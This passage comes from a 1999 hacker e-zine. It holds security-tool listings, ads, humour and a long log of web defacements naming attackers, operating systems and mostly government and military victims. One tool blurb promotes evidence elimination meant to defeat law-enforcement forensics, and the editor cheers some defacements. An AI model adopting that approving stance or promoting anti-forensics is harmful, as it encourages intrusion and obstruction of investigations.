from the context menu. 4. Evidence Eliminator by ESoft(UK) Relevant URL: http://www.securityfocus.com/data/tools/eelm202.zip This security tool eliminates all evidence from your PC in one single click of a button. In tests, Evidence Eliminator defeats "Forensic Analysis" software as used by investigators, law-enforcement etc. 5. Access Sentinel 3.0 by Sentinel@XProc.com Relevant URL: http://www.securityfocus.com/data/tools/accsntl.zip Protect your Win95/98 files and folders with this kernel-mode operating system security extension. Tightly integrated with the Windows Shell, Sentinel allows you to hide, monitor, and block access to files and folders using nothing more than the Windows Explorer File Properties dialog. Also allows you to watch in realtime all activity on your harddrive. Designed for ease-of-use and minimal fuss. 6. Alot MoniCA 1.1 by Alot Enterprises Relevant URL: http://www.securityfocus.com/data/tools/amnset11.zip MoniCA is a Client Application Monitor. Why use MoniCA? You can use MoniCA when you want to know, Who, when and what were doing on your standalone and network computers. How long a particular program was running;. When your office computers were used not for business. What your family was doing when you were not at home. Who was reading your own documents. How to optimize computer usage in your office according to statistics. MoniCA can operate on local network and on a standalone computer as well. IX. SPONSOR INFORMATION - ------------------------------------------ URL: http://www.ntobjectives.com NT OBJECTives, Inc. is a small company dedicated to building network security tools for the Windows NT platform. Our current line of tools is directed at security forensics. We base our designs around fast, visually intuitive interfaces with a sharp focus on making security analysis easy. This is the foundation of our tool line. Our goal is for each of our successive product builds to enhance previous capabilities so that you have a comprehensive set of tools at your disposal. We keep abreast of current trends, tools, and issues, so that we can bring you quality network tools X. SUBSCRIBE/UNSUBSCRIBE INFORMATION ------------------------------------- 1. How do I subscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of: SUBSCRIBE SF-NEWS Lastname, Firstname You will receive a confirmation request message to which you will have to anwser. 2. How do I unsubscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address with a message body of: UNSUBSCRIBE SF-NEWS If your email address has changed email aleph1@securityfocus.com and I will manualy remove you. 3. How do I disable mail delivery temporarily? If you will are simply going in vacation you can turn off mail delivery without unsubscribing by sending LISTSERV the command: SET SF-NEWS NOMAIL To turn back on e-mail delivery use the command: SET SF-NEWS MAIL 4. Is the list available in a digest format? Yes. The digest generated once a day. 5. How do I subscribe to the digest? To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to LISTSERV@SECURITYFOCUS.COM with with a message body of: SET SF-NEWS DIGEST 6. How do I unsubscribe from the digest? To turn the digest off send a message to LISTSERV with a message body of: SET SF-NEWS NODIGEST If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next. 7. I seem to not be able to unsubscribe. What is going on? You are probably subscribed from a different address than that from which you are sending commands to LISTSERV from. Either send email from the appropiate address or email the moderator to be unsubscribed manually. Alfred Huger VP of Operations Security Focus @HWA -=----------=- -=----------=- -=----------=- -=----------=- 0 0 0 o O O O 0 =----------=- -=----------=- -=----------=- -=----------=- -=----------=- =----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** When people ask you "Who is Kevin Mitnick?" do you have an answer? www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre http://www.2600.com/ http://www.kevinmitnick.com +-----------------------------------------------------------------------------+ | SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +-----------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * http://www.csoft.net" One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // // or cruciphux@dok.org // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... So, you want a puzzle do you? well crack the 'code' at the beginning and end of the newsletter only one person has done it so far, so go ahead get your crypto sk1llz out and try cracking it. its easy! ____ _ _ _ _ _ / ___| ___ _ __ __| (_)_ __ _ _ ___ _ _ _ __ / \ ___ ___(_|_) \___ \ / _ \ '_ \ / _` | | '_ \| | | |/ _ \| | | | '__| / _ \ / __|/ __| | | ___) | __/ | | | (_| | | | | | |_| | (_) | |_| | | / ___ \\__ \ (__| | | |____/ \___|_| |_|\__,_|_|_| |_|\__, |\___/ \__,_|_| /_/ \_\___/\___|_|_| |___/ / \ _ __| |_ / _ \ | '__| __| / ___ \| | | |_ /_/ \_\_| \__| TOO, for inclusion in future issues Do the HWA logo etc and we'll showcase it here to show off your talents...remember the 80's? dig out those ascii editors and do yer best... _| _|_|_| _|_| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _|_|_| _|_| _|_| _| _|_| _| _|_| _| _|_| _|_| _|_| _|_|_|_| _| _|_| _| _| _| _| _| _|_| _| _| _| _| _| _| _| _|_| _|_| _|_| _| _________________________ /| /| | | ||__|| | HAX0R FOR HIRE ... | / O O\__ WILL HACK FOR | / \ BACK ISSUES OF 2600 | / \ \ | / _ \ \ --------------------- / |\____\ \ || / | | | |\____/ || / \|_|_|/ | __|| / / \ |____| || / | | /| | --| | | |// |____ --| * _ | |_|_|_| | \-/ *-- _--\ _ \ // | / _ \\ _ // | / * / \_ /- | - | | * ___ c_c_c_C/ \C_c_c_c____________ _________ (Ascii art from V0iD magazine #7) Croatian Poetry contributed by ch4 Panta rei ?! Noge od perja, Brzopleto plutaju po snjegu, Dok leptir puzi po uraganu. Krvav val, Stidnjivo brise zvijezde, A žohar lomi kosti lava. Izgoren list, Guta izmet robota, Da bi kitu krali rogove. By sime -=- Contributed by FProphet Found this while trolling the net, check out some other words on the engine, its quite funny. http://www.dictionary.com/cgi-bin/dict.pl?term=warez%20d00dz warez d00dz /weirz doodz/ /n./ A substantial subculture of crackers refer to themselves as `warez d00dz'; there is evidently some connection with B1FF here. As `Ozone Pilot', one former warez d00d, wrote: Warez d00dz get illegal copies of copyrighted software. If it has copy protection on it, they break the protection so the software can be copied. Then they distribute it around the world via several gateways. Warez d00dz form badass group names like RAZOR and the like. They put up boards that distribute the latest ware, or pirate program. The whole point of the Warez sub-culture is to get the pirate program released and distributed before any other group. I know, I know. But don't ask, and it won't hurt as much. This is how they prove their poweress [sic]. It gives them the right to say, "I released King's Quest IVXIX before you so obviously my testicles are larger." Again don't ask... The studly thing to do if one is a warez d00d, it appears, is emit `0-day warez', that is copies of commercial software copied and cracked on the same day as its retail release. Warez d00ds also hoard software in a big way, collecting untold megabytes of arcade-style games, pornographic GIFs, and applications they'll never use onto their hard disks. As Ozone Pilot acutely observes: [BELONG] is the only word you will need to know. Warez d00dz want to belong. They have been shunned by everyone, and thus turn to cyberspace for acceptance. That is why they always start groups like TGW, FLT, USA and the like. Structure makes them happy. [...] Warez d00dz will never have a handle like "Pink Daisy" because warez d00dz are insecure. Only someone who is very secure with a good dose of self-esteem can stand up to the cries of fag and girlie-man. More likely you will find warez d00dz with handles like: Doctor Death, Deranged Lunatic, Hellraiser, Mad Prince, Dreamdevil, The Unknown, Renegade Chemist, Terminator, and Twin Turbo. They like to sound badass when they can hide behind their terminals. More likely, if you were given a sample of 100 people, the person whose handle is Hellraiser is the last person you'd associate with the name. The contrast with Internet hackers is stark and instructive. See cracker, wannabee, handle, elite; compare weenie, spod. @HWA SITE.1 You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ ___| _ \ | | __| _` |\ \ / | | __| _ \ _` | | | ( | ` < | | | __/ ( | \____|_| \__,_| _/\_\\___/ _| \___|\__,_| Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. >Start< Naval School of Health Sciences (www-nshs.med.navy.mil) Energy Systems Division, Argonne National Labs (www.es.anl.gov) Solid State Theory Group, National Renewable Energy Laboratory (www.sst.nrel.gov) Naval Medical Research Institute (www.nmri.nnmc.navy.mil) National Institute on Alcohol Abuse and Alcoholism (www.niaaa.nih.gov) USDA Rural Development (www.rurdev.usda.gov) U.S. Tax Court (www.ustaxcourt.gov) Federal Occupational Health, DHHS (www.foh.dhhs.gov) Rural Empowerment Zones and Enterprise Communities, USDA and HUD (www.ezec.gov) U.S. Navy Electronic Commerce Homepage (www.ec.navsup.navy.mil) Defense Commissary Agency (www.deca.mil) #2 Malaysian Science and Technology Information Centre (www.mastic.gov.my) Banco Federativo (federativo.bndes.gov.br) Account View (www.accountview.nl) #2 Bureau of Transportation for Taipei City (www.dot.taipei.gov.tw) Nanning - Guangxi (www.nn.gx.cn) Defaced domain: dssg-web-srv.ncr.disa.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/31/dssg-web-srv.ncr.disa.mil Defaced by: fuqraq Operating System: NT Date 11/1/99 Defaced domain: www.adb-partner.no Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.adb-partner.no Defaced by: unknown Operating System: NT Date 11/1/99 Defaced domain: www.shop.worldonline.nl Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.shop.worldonline.nl Defaced by: unknown Operating System: NT Date 11/1/99 Defaced domain: www.mita.nl Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.mita.nl Defaced by: Phreak.nl Operating System: NT Date 11/1/99 Defaced domain: ustecnet.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/ustecnet.com Defaced by: dhc Operating System: NT Date 11/1/99 Defaced domain: dawn.worldonline.nl Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/dawn.worldonline.nl Defaced by: phreak.nl Operating System: NT Date 11/1/99 Defaced domain: hydr.ct.tudelft.nl Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/hydr.ct.tudelft.nl Defaced by: phreak.nl Operating System: NT Date 11/1/99 Defaced domain: www.netopia.no Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.netopia.no Defaced by: unknown Operating System: NT Date 11/1/99 Defaced domain: www.adam.au.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.adam.au.com Defaced by: phreak.nl Operating System: Linux Date 11/1/99 Defaced domain: www.dnd.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.dnd.ca Defaced by: hv2k Operating System: NT Date 11/1/99 Defaced domain: www.itcampeche.edu.mx Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.itcampeche.edu.mx Defaced by: treaty Operating System: Solaris Date 11/1/99 Defaced domain: www.doeal.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.doeal.gov Defaced by: Pakistan HC Operating System: Windows NT (IIS/4.0) Date 11/1/99 Defaced domain: maif.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/maif.gov Defaced by: Hi-Tech Hate/h4p Operating System: Fingerprint failed (!) Date 11/1/99 Defaced domain: webster.webfld.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/webster.webfld.navy.mil Defaced by: hv2k Operating System: NT Date 11/1/99 Defaced domain: www.ummah.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.ummah.net Operating System: FreeBSD (Apache 1.3b5) Date 11/1/99 Defaced domain: www.cnu.gov.ve Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.cnu.gov.ve Defaced by: Hven team Operating System: Windows NT Date 11/1/99 Defaced domain: www.iwakuni.usmc.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.iwakuni.usmc.mil Defaced by: hV2k Operating System: Windows NT Date 11/1/99 Defaced domain: www.norfolk.atrc.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.norfolk.atrc.navy.mil Defaced by: hV2k Operating System: Windows NT Date 11/1/99 Defaced domain: www.tenderimages.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.tenderimages.com Defaced by: p4riah Operating System: Windows NT (IIS/4.0) Date 11/2/99 Defaced domain: www.esdcinc.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.esdcinc.com Defaced by: Contr0l-C Operating System: Windows NT (IIS/4.0) Date 11/2/99 Defaced domain: www.fbody.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.fbody.com Defaced by: HiP Operating System: BSDI 3.0 (Apahe 1.2.6) Date 11/2/99 Defaced domain: www.hardcorebands.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.hardcorebands.com Defaced by: HiP Operating System: Linux (Apache/1.3.3) Date 11/2/99 Defaced domain: federativo.bndes.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/federativo.bndes.gov.br Defaced by: JxLxMx Operating System: NT Date 11/2/99 Defaced domain: www.seplan.gov.br #1 Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.seplan.gov.br Defaced by: JxLxMx Operating System: NT Defaced domain: www.kyungsung.ac.kr Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.kyungsung.ac.kr Defaced by: kryptek Operating System: Solaris Date 11/2/99 Defaced domain: www.gennet.ee Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.gennet.ee Defaced by: Verb0 Operating System: Windows NT Date 11/2/99 Defaced domain: www.chapman-lab.uaf.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.chapman-lab.uaf.edu Defaced by: Verb0 Operating System: Windows NT Date 11/2/99 Defaced domain: www.seplan.gov.br #2 Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.seplan.gov.br Defaced by: Fuby Operating System: Windows NT Date 11/2/99 Defaced domain: www.mog.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.mog.gov.br Defaced by: Fuby Operating System: Windows NT Date 11/2/99 Defaced domain: www.cateringnet.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.cateringnet.co.uk Defaced by: Fuby Operating System: Windows NT Date 11/2/99 Defaced domain: www.creactive.fr Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.creactive.fr Defaced by: Fuby Operating System: Windows NT Date 11/2/99 Defaced domain: www.nn.gx.cn Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.nn.gx.cn Defaced by: kryptek Operating System: Solaris Date 11/2/99 Defaced domain: www.statssa.gov.za Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.statssa.gov.za Defaced by: Fuby Operating System: Windows NT Date 11/2/99 Defaced domain: www.accountview.nl Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.accountview.nl Defaced by: Hit2000 Operating System: Windows NT (IIS/4.0) Date 11/2/99 Defaced domain: www-nehc.med.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www-nehc.med.navy.mil Operating System: Windows NT (IIS/4.0) Date 11/2/99 Defaced domain: www.dot.taipei.gov.tw Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.dot.taipei.gov.tw Defaced by: Fuby Operating System: Windows NT (IIS/4.0) Date 11/2/99 Defaced domain: federativo.bndes.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/federativo.bndes.gov.br Defaced by: Fuby Operating System: Windows NT (IIS/4.0) Date 11/2/99 Defaced domain: www.mastic.gov.my Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.mastic.gov.my Defaced by: Fuby Operating System: Windows NT (IIS/3.0) Date 11/2/99 Defaced domain: www.deca.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.deca.mil Defaced by: fuqrag Operating System: Windows NT (IIS/4.0) Date 11/2/99 Defaced domain: www.cipex.com.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.cipex.com.br Defaced by: Death Knights Operating System: Linux (Apache 1.3.6) Date 11/2/99 Defaced domain: www.paradoxtech.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.paradoxtech.com Defaced by: n45ty Operating System: Linux (Apache 1.3.6) Date 11/2/99 Defaced domain: www.ngc.peachnet.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.ngc.peachnet.edu Defaced by: xhostile and MetalTung Operating System: Windows NT (IIS/4.0) Date 11/3/99 Defaced domain: www.ezec.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.ezec.gov Defaced by: hV2k Operating System: NT Date 11/3/99 Defaced domain: www.foh.dhhs.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.foh.dhhs.gov Defaced by: hV2k Operating System: NT Date 11/3/99 Defaced domain: www.copcomputer.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.copcomputer.com Operating System: BSDI (Apache 1.2.4) Date 11/3/99 Defaced domain: www.ec.navsup.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.ec.navsup.navy.mil Defaced by: fuqrag Operating System: Windows NT (IIS/4.0) Date 11/3/99 Defaced domain: www.statssa.gov.za Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.statssa.gov.za Defaced by: OzzMan Operating System: Windows NT Date 11/3/99 Defaced domain: www.sefaz.go.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.sefaz.go.gov.br Defaced by: Inferno.BR Operating System: Windows NT Date 11/3/99 Defaced domain: www.ktb.co.kr Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.ktb.co.kr Defaced by: kryptek Operating System: Solaris 2.5x (NCSA/1.5) Date 11/3/99 Defaced domain: www.rurdev.usda.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.rurdev.usda.gov Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/3/99 Defaced domain: www.ustaxcourt.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.ustaxcourt.gov Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/3/99 Defaced domain: www.cram-sudest.fr Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.cram-sudest.fr Defaced by: JLM Operating System: Windows NT (IIS/4.0) Date 11/3/99 Defaced domain: www.bearland.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.bearland.com Defaced by: p4riah Operating System: Windows NT (IIS/4.0) Date 11/3/99 Defaced domain: www.nyise.org/access Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.nyise.org/access Defaced by: PhantasmP Operating System: Windows NT (IIS/4.0) Defaced domain: www.coopvgg.com.ar Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.coopvgg.com.ar Defaced by: vendetta Operating System: Solaris 2.x (Netscape-Enterprise 3.5.1) Date 11/3/99 Defaced domain: mecara.fpms.ac.be Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/mecara.fpms.ac.be Defaced by: Genocide Juice Operating System: Linux Date 11/3/99 Defaced domain: www.ceaa.gc.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.ceaa.gc.ca Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/3/99 Defaced domain: www.nf.hrdc-drhc.gc.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.nf.hrdc-drhc.gc.ca Defaced by: hV2k Operating System: NT Date 11/3/99 Defaced domain: www.nf.hrdc-drhc.gc.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.nf.hrdc-drhc.gc.ca Defaced by: hV2k Operating System: NT Date 11/4/99 Defaced domain: www.acadiau.ca Mirror: http://www.attrition.org/mirror/attrition/1999/10/31/www.acadiau.ca Defaced by: p0g0 Operating System: Solaris 2.5x (Apache 1.3.1) Date 11/4/99 Defaced domain: www.ftscpac.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/30/www.ftscpac.navy.mil Defaced by: Pakistan Hackerz Club Operating System: Windows NT Date 11/4/99 Defaced domain: www.lcc.whecn.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.lcc.whecn.edu Defaced by: MetalTung and xhostile Operating System: NT Date 11/4/99 Defaced domain: www.oak.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.oak.edu Defaced by: xhostile and MetalTung Operating System: NT Date 11/4/99 Defaced domain: www.gov.nf.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.gov.nf.ca Defaced by: hV2k Operating System: NT Date 11/4/99 Defaced domain: www.borealc.on.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.borealc.on.ca Defaced by: Adoni and symbolik Operating System: NT Date 11/4/99 Defaced domain: www.nmri.nnmc.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.nmri.nnmc.navy.mil Defaced by: fuqrag Operating System: NT Date 11/4/99 Defaced domain: www.pakbiz.com.pk Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.pakbiz.com.pk Defaced by: h1gh Operating System: PowerBSD - Apache/1.2.6 Date 11/4/99 Defaced Page: http://www.navy.mi.th/main.htm Defaced by: Verbo OS: Windows NT/IIS 3.0 Date 11/4/99 Defaced domain: www.beckie.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.beckie.com Defaced by: Blade/Psycho Surfer Operating System: NT Date 11/4/99 Defaced domain: www.mastic.gov.my Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.mastic.gov.my Defaced by: fuby Operating System: NT Date 11/4/99 Defaced domain: innebandy.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/innebandy.net Defaced by: SunDevil & Zolar Operating System: NT Date 11/4/99 Defaced domain: www.sci.hiroshima-u.ac.jp Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.sci.hiroshima-u.ac.jp Defaced by: kryptek Operating System: Solaris Date 11/4/99 Defaced domain: www.zedd.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.zedd.com Defaced by: SunDevil Operating System: NT Date 11/4/99 Defaced domain: www.cga.state.ct.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.cga.state.ct.us Defaced by: aL3x Operating System: NT Date 11/4/99 Defaced domain: www.perfectplan.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.perfectplan.com Defaced by: SunDevil Operating System: NT Date 11/4/99 Defaced domain: www.sst.nrel.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.sst.nrel.gov Defaced by: hV2k Operating System: NT Date 11/4/99 Defaced domain: www.nyise.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.nyise.org Defaced by: Fuby (again) Operating System: Windows NT (IIS/4.0) Date 11/4/99 Defaced domain: www.es.anl.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.es.anl.gov Defaced by: hV2k Operating System: NT Date 11/4/99 Defaced domain: www.digisys.com.lb Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.digisys.com.lb Defaced by: w0lf Operating System: Irix Date 11/4/99 Defaced domain: www.melissa.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.melissa.com Defaced by: p4riah Operating System: Solaris Date 11/4/99 Defaced domain: www.lucifer.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.lucifer.com Defaced by: Gabriel Operating System: Linux Date 11/4/99 Defaced domain: www.saltillo.gob.mx Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.saltillo.gob.mx Defaced by: hi tech hate Operating System: SCO Date 11/5/99 Defaced domain: russian.dmll.cornell.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/russian.dmll.cornell.edu Defaced by: Narcissus Operating System: Windows NT (WebSite/1.1h) Date 11/5/99 Defaced domain: www.nabco.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.nabco.org Defaced by: kryptek Operating System: Solaris Date 11/5/99 Defaced domain: www.financials98.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.financials98.com Defaced by: verb0 Operating System: NT Date 11/5/99 Defaced: www.jn.pt By: f0rpaxe mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.jn.pt/ os: Windows NT (IIS/4.0) Date 11/5/99 Defaced domain: www-nshs.med.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www-nshs.med.navy.mil Defaced by: Verb0 Operating System: Windows NT Date 11/5/99 Defaced domain: www.aecl.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.aecl.ca Defaced by: ch4x Operating System: NT Date 11/5/99 Defaced domain: www.freeshells.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.freeshells.com Defaced by: xhostile Operating System: NT Date 11/5/99 Defaced domain: parkscanada.pch.gc.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/parkscanada.pch.gc.ca Defaced by: chem/Shark Operating System: NT Date 11/5/99 Defaced domain: interal.qc.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/interal.qc.ca Defaced by: unknown Operating System: NT Date 11/5/99 Defaced domain: canadacouncil.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/canadacouncil.ca Defaced by: unknown Operating System: NT Date 11/5/99 Defaced domain: www.cornwall.ac.uk Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.cornwall.ac.uk Defaced by: vendetta Operating System: Solaris Date 11/5/99 Defaced domain: www.tax.state.ny.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.tax.state.ny.us Defaced by: hV2k Operating System: NT Date 11/6/99 Defaced domain: janus.state.me.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/janus.state.me.us Defaced by: hV2k Operating System: NT Date 11/6/99 Defaced domain: www.buddhakatrecords.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.buddhakatrecords.com Defaced by: Pinky The Penguin Operating System: NT Date 11/6/99 Site:www.samhsa.gov OS: NT/IIS4.0 Group: keebler elves (their back) Date 11/6/99 Defaced domain: www.parkscanada.pch.gc.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.parkscanada.pch.gc.ca Defaced by: chem/Shark Operating System: NT Date 11/6/99 Defaced domain: www.keebler.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.keebler.com Defaced by: keebler Operating System: NT Date 11/6/99 Defaced domain: www.gordongraydon.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.gordongraydon.com Defaced by: pyrostorm Operating System: Linux Date 11/6/99 Defaced domain: www.cub-ed.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.cub-ed.com Defaced by: p4riah Operating System: NT Date 11/6/99 Defaced domain: www.army.mod.uk Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.army.mod.uk Defaced by: keebler elves Operating System: NT Date 11/6/99 Defaced domain: www.eucom.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.eucom.mil Defaced by: keebler elves Operating System: NT Date 11/6/99 Defaced domain: www.keebler.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.keebler.com Defaced by: unknown Operating System: NT Date 11/6/99 Defaced domain: www.cnv.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.cnv.org Defaced by: keebler elves Operating System: NT Date 11/6/99 Defaced domain: lgenterprises.threadnet.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/lgenterprises.threadnet.com Defaced by: DHC Operating System: Linux Date 11/6/99 Defaced domain: www.hwa.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.hwa.net Defaced by: ch4x Operating System: NT Date 11/6/99 Defaced domain: 